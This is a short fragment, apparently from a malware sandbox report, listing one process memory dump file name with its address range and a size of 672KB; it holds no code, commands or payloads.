                                                                                                                                • memory/4964-2-0x0000000000A61000-0x0000000000B09000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  672KB